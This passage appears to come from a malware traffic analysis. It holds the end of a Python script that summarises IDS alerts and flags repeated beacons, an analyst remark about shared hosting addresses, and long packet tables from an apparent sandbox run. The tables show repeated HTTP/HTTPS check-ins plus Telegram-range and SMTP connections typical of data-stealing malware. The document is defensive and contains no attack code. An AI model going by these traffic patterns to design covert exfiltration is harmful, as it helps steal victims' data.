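        row = dict(zip(COLUMNS, cells))
        row["timestamp"] = datetime.strptime(row["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")
        for key in ("sid", "severity", "src_port", "dst_port"):
            row[key] = int(row[key])
        alerts.append(row)
    return alerts


def by_destination(alerts):
    """Per (dst_ip, dst_port): alert count, distinct client flows, SIDs, severities."""
    summary = {}
    for a in alerts:
        s = summary.setdefault((a["dst_ip"], a["dst_port"]),
                               {"alerts": 0, "flows": set(), "sids": set(), "severities": set()})
        s["alerts"] += 1
        s["flows"].add((a["src_ip"], a["src_port"]))  # new source port = new TCP connection
        s["sids"].add(a["sid"])
        s["severities"].add(a["severity"])
    return summary


def alert_window_seconds(alerts):
    """Seconds between the first and the last alert."""
    times = [a["timestamp"] for a in alerts]
    return (max(times) - min(times)).total_seconds()


def repeated_beacons(alerts, min_flows=3):
    """Destinations contacted on at least min_flows separate connections."""
    return sorted(k for k, s in by_destination(alerts).items() if len(s["flows"]) >= min_flows)


if __name__ == "__main__":
    alerts = parse_alerts(ALERT_ROWS)
    for (ip, port), s in sorted(by_destination(alerts).items()):
        print(f"{ip}:{port} alerts={s['alerts']} flows={len(s['flows'])} sids={sorted(s['sids'])}")
    print("window:", round(alert_window_seconds(alerts), 3), "s; beacons:", repeated_beacons(alerts))
```

Treat the destination addresses as context rather than as blocklist entries on their own: 142.250.185.174 and 188.114.97.3 sit in Google and Cloudflare ranges shared by many tenants, so the flow pattern and the hostnames behind these connections are the indicators worth keeping.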
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 22, 2024 16:04:12.902620077 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:12.902672052 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:12.902757883 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:12.913573980 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:12.913589001 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:13.773917913 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:13.773994923 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:13.775017977 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:13.775080919 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:13.827322006 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:13.827351093 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:13.827816963 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:13.827873945 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:13.829560995 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:13.871364117 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:14.198174953 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:14.198261023 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:14.198398113 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:14.198436022 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:14.198479891 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:14.232996941 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:14.233042955 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:14.233189106 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:14.233568907 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:14.233589888 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:15.098956108 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:15.099041939 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:15.103468895 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:15.103483915 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:15.103863001 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:15.103916883 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:15.104291916 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:15.151323080 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.693398952 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.693504095 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.702198982 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.702264071 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.811713934 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.811849117 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.811996937 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.812033892 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.812089920 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.812112093 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.812195063 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.812201023 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.812287092 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.816566944 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.816629887 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.816637993 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.816679001 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.825105906 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.825174093 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.825182915 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.825227976 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.833801985 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.833874941 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.833884001 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.833924055 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.842605114 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.842669964 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.842695951 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.842750072 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.842784882 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.842833996 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.851305962 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.851397991 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.851422071 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.851469040 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.860047102 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.860150099 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.860192060 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.860239029 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.869028091 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.869095087 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.869116068 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.869155884 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.930668116 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.930811882 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.930841923 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.930895090 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.930902004 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.930941105 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.930948019 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.930983067 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.931032896 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.931087971 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.931355953 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.931410074 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.931442976 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.931493044 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.931550026 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.931595087 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.931969881 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:24.382924080 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:24.382989883 CEST | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:24.383486986 CEST | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:24.387118101 CEST | 49716 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:24.388328075 CEST | 49718 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:24.392925978 CEST | 80 | 49716 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:24.393023968 CEST | 49716 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:24.393682957 CEST | 80 | 49718 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:24.393773079 CEST | 49718 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:24.393897057 CEST | 49718 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:24.399233103 CEST | 80 | 49718 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:25.238945007 CEST | 80 | 49718 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:25.241086960 CEST | 49719 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:25.241153002 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:25.241211891 CEST | 49719 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:25.241617918 CEST | 49719 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:25.241631031 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:25.291538000 CEST | 49718 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:25.880044937 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:25.882128954 CEST | 49719 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:25.882164001 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:26.027864933 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:26.027971983 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:26.028069973 CEST | 49719 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:26.028506994 CEST | 49719 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:26.032098055 CEST | 49718 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:26.033636093 CEST | 49720 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:26.038079023 CEST | 80 | 49718 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:26.038181067 CEST | 49718 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:26.039117098 CEST | 80 | 49720 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:26.039199114 CEST | 49720 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:26.039328098 CEST | 49720 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:26.044672966 CEST | 80 | 49720 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:26.703584909 CEST | 80 | 49720 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:26.704999924 CEST | 49721 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:26.705060959 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:26.705173969 CEST | 49721 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:26.705416918 CEST | 49721 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:26.705426931 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:26.749053001 CEST | 49720 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:27.320470095 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:27.321974993 CEST | 49721 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:27.322007895 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:27.464806080 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:27.464920044 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:27.464975119 CEST | 49721 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:27.465465069 CEST | 49721 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:27.468904018 CEST | 49720 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:27.469589949 CEST | 49722 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:27.474997044 CEST | 80 | 49722 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:27.475188017 CEST | 80 | 49720 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:27.475234985 CEST | 49722 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:27.475265980 CEST | 49720 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:27.475423098 CEST | 49722 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:27.484105110 CEST | 80 | 49722 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:28.137046099 CEST | 80 | 49722 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:28.140610933 CEST | 49723 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:28.140664101 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:28.140749931 CEST | 49723 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:28.146194935 CEST | 49723 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:28.146209002 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:28.186511040 CEST | 49722 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:28.762384892 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:28.763837099 CEST | 49723 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:28.763866901 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:28.905388117 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:28.905505896 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:28.905570030 CEST | 49723 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:28.906043053 CEST | 49723 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:28.909512043 CEST | 49722 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:28.910737991 CEST | 49724 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:28.915617943 CEST | 80 | 49722 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:28.915720940 CEST | 49722 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:28.916182041 CEST | 80 | 49724 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:28.916289091 CEST | 49724 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:28.916474104 CEST | 49724 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:28.921853065 CEST | 80 | 49724 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:29.574677944 CEST | 80 | 49724 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:29.576064110 CEST | 49725 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:29.576108932 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:29.576216936 CEST | 49725 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:29.576499939 CEST | 49725 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:29.576510906 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:29.624943018 CEST | 49724 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:30.173655987 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:30.175339937 CEST | 49725 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:30.175385952 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:30.315337896 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:30.315428972 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:30.315509081 CEST | 49725 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:30.315964937 CEST | 49725 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:30.319032907 CEST | 49724 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:30.319777012 CEST | 49726 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:30.324909925 CEST | 80 | 49724 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:30.325028896 CEST | 49724 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:30.325551987 CEST | 80 | 49726 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:30.325628996 CEST | 49726 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:30.325721025 CEST | 49726 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:30.331250906 CEST | 80 | 49726 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:30.988492966 CEST | 80 | 49726 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:31.029916048 CEST | 49727 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:31.029967070 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:31.030067921 CEST | 49727 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:31.030268908 CEST | 49726 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:31.030535936 CEST | 49727 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:31.030546904 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:31.646409988 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:31.647941113 CEST | 49727 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:31.647963047 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:31.792936087 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:31.793045998 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.10 |
Oct 22, 2024 16:04:31.793176889 CEST | 49727 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:31.793632984 CEST | 49727 | 443 | 192.168.2.10 | 188.114.97.3 |
Oct 22, 2024 16:04:31.822829962 CEST | 49726 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:31.828690052 CEST | 80 | 49726 | 193.122.130.0 | 192.168.2.10 |
Oct 22, 2024 16:04:31.828923941 CEST | 49726 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:31.830674887 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:31.830712080 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:31.831253052 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:31.831716061 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:31.831727982 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:32.663609028 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:32.663738012 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:32.666831017 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:32.666847944 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:32.667126894 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:32.668617964 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:32.711343050 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:32.902990103 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:32.903064966 CEST | 443 | 49728 | 149.154.167.220 | 192.168.2.10 |
Oct 22, 2024 16:04:32.903153896 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:32.905893087 CEST | 49728 | 443 | 192.168.2.10 | 149.154.167.220 |
Oct 22, 2024 16:04:38.817065954 CEST | 49714 | 80 | 192.168.2.10 | 193.122.130.0 |
Oct 22, 2024 16:04:39.038866043 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:39.044279099 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:39.044500113 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:39.782625914 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:39.787214994 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:39.792679071 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.036479950 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.036618948 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:40.041965961 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.291269064 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.291817904 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:40.298890114 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.548450947 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.548522949 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.548558950 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.548585892 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:40.551434994 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:40.558651924 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.801074982 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:40.803610086 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:40.809405088 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.055737019 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.056462049 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:41.062128067 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.373395920 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.374100924 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:41.379498005 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.689507008 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.689893961 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:41.695252895 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.939440966 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.940094948 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Oct 22, 2024 16:04:41.946177006 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 |
Oct 22, 2024 16:04:41.946259022 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 22, 2024 16:04:12.889697075 CEST | 57120 | 53 | 192.168.2.10 | 1.1.1.1 |
Oct 22, 2024 16:04:12.898243904 CEST | 53 | 57120 | 1.1.1.1 | 192.168.2.10 |
